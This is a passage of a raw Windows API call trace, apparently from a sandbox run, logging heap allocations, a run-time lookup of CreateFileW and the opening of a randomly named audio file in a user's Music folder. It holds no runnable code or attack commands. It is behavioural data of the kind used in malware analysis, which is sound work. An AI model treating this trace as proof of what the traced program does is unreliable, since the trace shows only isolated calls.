dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0112.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0112.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0112.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0112.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.839] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0112.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0112.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.840] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0112.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0112.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0112.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0112.841] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\p0gi1wm_f5y2n.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0112.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0112.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.843] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.845] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.845] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.845] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0112.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0112.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0112.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | 